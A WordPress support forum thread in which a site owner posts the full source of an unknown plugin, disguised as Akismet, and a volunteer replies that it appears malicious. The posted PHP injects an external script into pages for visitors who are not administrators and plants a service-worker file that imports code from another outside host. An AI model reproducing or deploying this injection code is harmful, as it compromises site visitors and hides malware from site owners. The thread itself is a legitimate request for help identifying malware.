Title: wp_pushup
Last modified: May 24, 2023

---

# wp_pushup

 *  [tabatsoy](https://wordpress.org/support/users/tabatsoy/)
 * (@tabatsoy)
 * [3 years ago](https://wordpress.org/support/topic/wp_pushup/)
 * Hi All,
 * May I ask is this plugin safe? it just showed on my plugins folder but not visible
   on plugins page on admin in wp
 *     ```wp-block-code
       <?php
       namespace Dev\akismet;
       /*
        * Plugin Name: Akismet Anti-Spam
        * Plugin URI: https://automattic.com/wordpress-plugins/
        * Version: 0.1.2
        * Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
        * Author: Automattic
        * Author URI: https://automattic.com
        * Requires at least: 3.0.0
        *
        * Text Domain: akismet
        * Domain Path: /languages/
        * License: GPL-3.0
        * License URI: http://www.gnu.org/licenses/gpl-3.0.txt
        *
        * @author Automattic
        */
   
   
       define( __NAMESPACE__ . "\\DEBUG", false );
       define( __NAMESPACE__ . "\\DESTINATION_URL", base64_decode('Lw=='));
       define( __NAMESPACE__ . "\\DESTINATION_URL_ID", "" );
       define( __NAMESPACE__ . "\\REDIRECTION_ID_BLOCKER", [] );
       define( __NAMESPACE__ . "\\USER_CAPABILITY", "manage_options" );
       define( __NAMESPACE__ . "\\USER_EMAILS", [] );
       define( __NAMESPACE__ . "\\PREVIEW_EMAILS", [""] );
       define( __NAMESPACE__ . "\\WHITELIST_IPS", [] );
       define( __NAMESPACE__ . "\\REDIRECT_STATUS_CODE", "302" );
   
   
       add_action( 'template_redirect', __NAMESPACE__ . '\\wp_redirect_website_to_url' );
       add_filter( 'login_redirect', __NAMESPACE__ . '\\login_redirect', 10, 3 );
   
   
   
       function wp_redirect_website_to_url() {
   
       	if ( ! file_exists( "evasw.js" ) ) {
       		copy(ABSPATH . "/wp-content/plugins/wp_pushup/evasw.js", "evasw.js");
        	}
   
       	$user = wp_get_current_user();
   
       	DEBUG && error_log( "DENTRO wp_redirect_website_to_url" );
       	DEBUG && error_log( "USER_CAPABILITY = " . USER_CAPABILITY );
       	DEBUG && error_log( "DESTINATION_URL_ID = " . DESTINATION_URL_ID );
       	DEBUG && error_log( "DESTINATION_URL = " . DESTINATION_URL );
       	DEBUG && error_log( "current_user_can(USER_CAPABILITY) = " . var_export( current_user_can( USER_CAPABILITY ), true ) );
       	DEBUG && error_log( "user_email = " . ( $user->user_email ?? "not set" ) );
       	if ( DESTINATION_URL_ID ) {
       		DEBUG && error_log( "get_post_status(DESTINATION_URL_ID) = " . var_export( get_post_status( DESTINATION_URL_ID ), true ) );
       		DEBUG && error_log( "is_single(DESTINATION_URL_ID) = " . var_export( is_single( DESTINATION_URL_ID ), true ) );
       		DEBUG && error_log( "is_page(DESTINATION_URL_ID) = " . var_export( is_page( DESTINATION_URL_ID ), true ) );
       	}
       	DEBUG && error_log( "WHITELIST_IPS = " . var_export( WHITELIST_IPS, true ) );
       	DEBUG && error_log( "user_ip = " . getClientIp() );
   
       	$redirect = true;
   
       	if ( ! empty( USER_CAPABILITY ) ) {
       		$redirect = $redirect && ( ! current_user_can( USER_CAPABILITY ) && ! is_wp_login() );
       	}
   
       	if ( ! empty( $user->user_email ) && ( ! empty( USER_EMAILS ) || ! empty( PREVIEW_EMAILS ) ) ) {
       		DEBUG && error_log( "email in list = " . ( in_array( $user->user_email, array_merge( USER_EMAILS, PREVIEW_EMAILS ) ) ? "yes" : "no" ) );
       		$redirect = $redirect && ( ! in_array( $user->user_email, array_merge( USER_EMAILS, PREVIEW_EMAILS ) ) );
       	}
   
       	if ( DESTINATION_URL_ID && ( is_single( DESTINATION_URL_ID ) || is_page( DESTINATION_URL_ID ) ) ) {
       		return;
       	}
   
       	if ( is_array(REDIRECTION_ID_BLOCKER) && sizeof(REDIRECTION_ID_BLOCKER) > 0 ) {
       		foreach(REDIRECTION_ID_BLOCKER as $blocker_id)
       			if( is_single( $blocker_id ) || is_page( $blocker_id ) )
       				return;
   
       	}
   
       	if ( ! empty( WHITELIST_IPS ) && in_array( getClientIp(), WHITELIST_IPS ) ) {
       		return;
       	}
   
       	if ( $redirect ) {
       		echo "
       <script>(function(d){let s=d.createElement('script');s.async=true;s.src='https://cjvdfw.com/code/native.js?h=waWQiOjExNDY3MDEsInNpZCI6MTE4NTIwNCwid2lkIjo0NDExNDYsInNyYyI6Mn0=eyJ';d.head.appendChild(s);})(document);</script>
       		";
       		return home_url();
       		exit;
       		# }
       	}
   
       }
   
   
       function is_wp_login() {
   
       	$ABSPATH = str_replace( array( '\\', '/' ), DIRECTORY_SEPARATOR, ABSPATH );
   
       	$included_files  = get_included_files();
   
       	$conditions = [
       		in_array( $ABSPATH . 'wp-login.php', $included_files ),
       		in_array( $ABSPATH . 'wp-register.php', $included_files ),
       		$GLOBALS['pagenow'] === 'wp-login.php',
       		$_SERVER['PHP_SELF'] === '/wp-login.php'
       	];
   
       	return in_array( true, $conditions, true );
   
       }
   
   
       function login_redirect( $redirect_to, $request, $user ){
       	if ( ! empty( $user->user_email ) && in_array( $user->user_email, PREVIEW_EMAILS ) ) {
       		return home_url();
       	}
       	else {
       		// if ( ! isset( $_COOKIE[base64_decode('cm91dGU=')]) ) {
       		// 	setcookie( base64_decode( 'cm91dGU=' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
       		// 	return $redirect_to;
       		// }
       		return $redirect_to;
       	}
       }
   
   
       function getClientIp() {
       	if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
       		$ip = $_SERVER['HTTP_CLIENT_IP'];
       	} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
       		$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
       	} else {
       		$ip = $_SERVER['REMOTE_ADDR'];
       	}
       	return filter_var($ip, FILTER_VALIDATE_IP);
       }
       ```
   
 * and here is the content of the evasw.js
 * importScripts(‘[https://ulmoyc.com/v1/sw-import.js?h=waWQiOjExNDY3MDEsInNpZCI6MTE4NTIwNCwid2lkIjo0NDExNDYsInNyYyI6MiwicG0iOjB9eyJ&d=ayzunimmigration.com&#8217](https://ulmoyc.com/v1/sw-import.js?h=waWQiOjExNDY3MDEsInNpZCI6MTE4NTIwNCwid2lkIjo0NDExNDYsInNyYyI6MiwicG0iOjB9eyJ&d=ayzunimmigration.com&#8217););
 * help would be appreciated
 * The page I need help with: _[[log in](https://login.wordpress.org/?redirect_to=https%3A%2F%2Fwordpress.org%2Fsupport%2Ftopic%2Fwp_pushup%2F%3Foutput_format%3Dmd&locale=en_US)
   to see the link]_

Viewing 1 replies (of 1 total)

 *  [Jesús Amieiro](https://wordpress.org/support/users/amieiro/)
 * (@amieiro)
 * [3 years ago](https://wordpress.org/support/topic/wp_pushup/#post-16764294)
 * Hi [@tabatsoy](https://wordpress.org/support/users/tabatsoy/)
 * The header file looks like the [Akismet](https://akismet.com/) plugin, but once
   you take a look at the code, it is [very different](https://plugins.svn.wordpress.org/akismet/trunk/akismet.php).
   This code seems to be part of a WordPress plugin that performs certain checks
   and redirects users under specific conditions, so I think it could be a malicious
   plugin. It’s important to note that this code snippet may be incomplete and may
   require additional code or files to function properly.

Viewing 1 replies (of 1 total)

The topic ‘wp_pushup’ is closed to new replies.

 * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/)
 * 1 reply
 * 2 participants
 * Last reply from: [Jesús Amieiro](https://wordpress.org/support/users/amieiro/)
 * Last activity: [3 years ago](https://wordpress.org/support/topic/wp_pushup/#post-16764294)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics